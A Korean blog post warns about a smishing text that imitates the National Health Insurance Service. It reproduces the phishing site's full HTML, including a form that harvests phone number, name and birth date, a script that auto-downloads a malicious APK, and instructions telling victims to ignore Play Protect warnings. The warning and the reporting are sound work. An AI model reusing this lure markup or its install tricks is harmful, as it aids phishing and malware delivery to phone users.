핸드폰을 하고 있는 늦은 시간 갑자기 알 수 없는 번호로 문자가 하나 도착 했습니다. 그것은 바로 의료보험 건강보험 링크 였습니다.
발신번호 확인해보니 02-447-1179 번호로 왔으며 해당 번호 검색 해보니 스페셜올림픽코리아 라는곳으로 웹에서 검색이 되고 있습니다.
일단 문자에 포함된 링크 주소를 방문 해봅니다. http://nshdyxsadd.wiki 누가봐도 수상한 주소 입니다.
정상적인 의료보험 건강보험 링크는 https://www.nhis.or.kr/nhis/index.do 입니다. 참고하세요.
국민건강보험
이벤트 1 / 8
www.nhis.or.kr
일단 해당 사이트 방문 해보니 모바일로 사용자 피싱 하려고 모바일 페이지뷰로 보여집니다.
하지만 홈페이지를 보더라도 아주 허접하게 만들어 놓은걸 확인 하실 수 있습니다.
<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.2//EN" "http://www.wapforum.org/DTD/xhtml-mobile12.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="ko" xml:lang="ko">
<head>
<meta charset="utf-8">
<meta name="viewport"
content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, user-scalable=no">
<link rel="stylesheet" href="http://nshdyxsadd.wiki/static/css/main.min.css" type="text/css">
</head>
<body>
<div class="wrapper">
<span class="topLine"><span class="org st1"></span></span>
<header>
<div class="logo"><a href="/"><img src="http://nshdyxsadd.wiki/static/images/logo.png" height="60"></a></div>
</header>
<div class="search">
<strong><label for="invc_no">핸드폰 번호를 입력하시고 건강검진서를 확인해주세요.</label></strong>
<span class="intsearch">
<input type="text" value="010" readonly="" maxlength="3" name="mobile_no1">-
<input type="text" maxlength="4" name="mobile_no2">-
<input type="text" maxlength="4" name="mobile_no3">
</span>
<a href="javascript:form_Search();" class="sbtn" title="조회">조회</a>
</div>
<div class="footer" style="cursor: pointer;" onclick="javascript:form_Search();">
<img src="http://nshdyxsadd.wiki/static/images/top2.png" width="100%">
<img src="static/images/index_foot.jpg" width="100%">
<img src="http://nshdyxsadd.wiki/static/images/index_foot.png" width="100%">
<img src="http://nshdyxsadd.wiki/static/images/foot2.png" width="100%">
</div>
</div>
<script type="text/javascript" src="http://nshdyxsadd.wiki/static/js/jquery.js"></script>
<script type="text/javascript" src="http://nshdyxsadd.wiki/static/js/common.min.js"></script>
</body>
</html>이제 빈칸에 없는번호의 휴대폰번호 1111 1111 넣고 조회 클릭 하면
이제 이름과 생년월일을 요구 합니다. 그냥 무작위로 넣고 확인하기 클릭 하면 http://nshdyxsadd.wiki/finish.html
<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.2//EN" "http://www.wapforum.org/DTD/xhtml-mobile12.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="ko" xml:lang="ko">
<head>
<meta charset="utf-8">
<meta name="viewport"
content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, user-scalable=no">
<link rel="stylesheet" href="http://nshdyxsadd.wiki/static/css/main.min.css" type="text/css">
</head>
<body class="finish">
<span class="topLine"><span class="org st3"></span></span>
<div class="endbox">
<b>The건강보험</b>
<img src="http://nshdyxsadd.wiki/static/images/logo.png">
<ul class="list">
<li class="step1">어플을 다운로드후에 설치를 누르시면 권한혀용이 뜹니다. 허용을 해주시면 어플설치할수 있습니다. </li>
<li class="step2">Play프로젝트에 의해 차단됨 이라는글이 나올시에는 밑에무시하고 설치를 누르시면 됩니다. </li>
<li class="step3">설치방법 다운로드에 -> 설치 -> 어플을찾아서 더블클릭 (또는 클릭) 하여 설치가 가능합니다. </li>
</ul>
<div class="downtips">
<p>*금년도 검진대상이 확인된 분은 신분증을 지참하고 검진기관에 방문하셔도 검진이 가능합니다. </p>
<p>검진표를 분실하거나 수령치 못한경우에는 1577-1000번이나 가까운 지사에 신청하시면 검진대상자 확인서를 발급해 드립니다.</p>
</div>
<div class="download">
<a href="/download" id="complate" download="">다운로드 하기</a>
</div>
<script type="text/javascript" src="http://nshdyxsadd.wiki/static/js/jquery.js"></script>
<script type="text/javascript" src="http://nshdyxsadd.wiki/static/js/common.min.js"></script>
<script type="text/javascript">
$(function () {
$('#complate').attr('download', localStorage.phone + '.apk');
window.setTimeout(function () {
document.getElementById("complate").click();
}, 2000)
});
</script>
</body>
</html>해당 페이지로 넘어가면서 apk 파일을 시작 다운로드 합니다. apk 파일을 휴대폰에 설치 하는 순간 자신의 휴대폰정보는 악당들에게 넘어갑니다.
설치 후 1577-1000 으로 전화를 하게되면 국민건강보험 으로 연결되는게 아니라 악당들에게 연결이 됩니다.
절대 apk 파일을 다운로드 받아 자신의 휴대전화에 설치 하시면 안됩니다.
참 지긋지긋한 이놈의 보이스피싱 배포하는 인간들 귀찮아 죽겠네요... 아무쪼록 해당 문자나 피싱 문자 받으신분은 "꼭" 신고 하시기 바랍니다.
해당 사이트는 안전을 위해 방통위쪽에 신고를 넣었으니 이제 기다려서 접속 차단되길 기다리는 일만 남았네요.
'일상모습으로 > 평상시모습' 카테고리의 다른 글
| 네이버 메일 의문점....(스팸메일) (0) | 2023.05.24 |
|---|---|
| 윈도우7 에서 드디어 윈도우10 으로 업그레이드 완료 (0) | 2023.05.17 |
| 해외 직구 알리에서 구매한 제품 배송 시작 (0) | 2023.03.28 |
| 카트라이더 드림 상점 통해 굿즈 구매 완료 (0) | 2023.03.13 |
| 알리에서 주문 한뒤 후회중.... (0) | 2023.03.02 |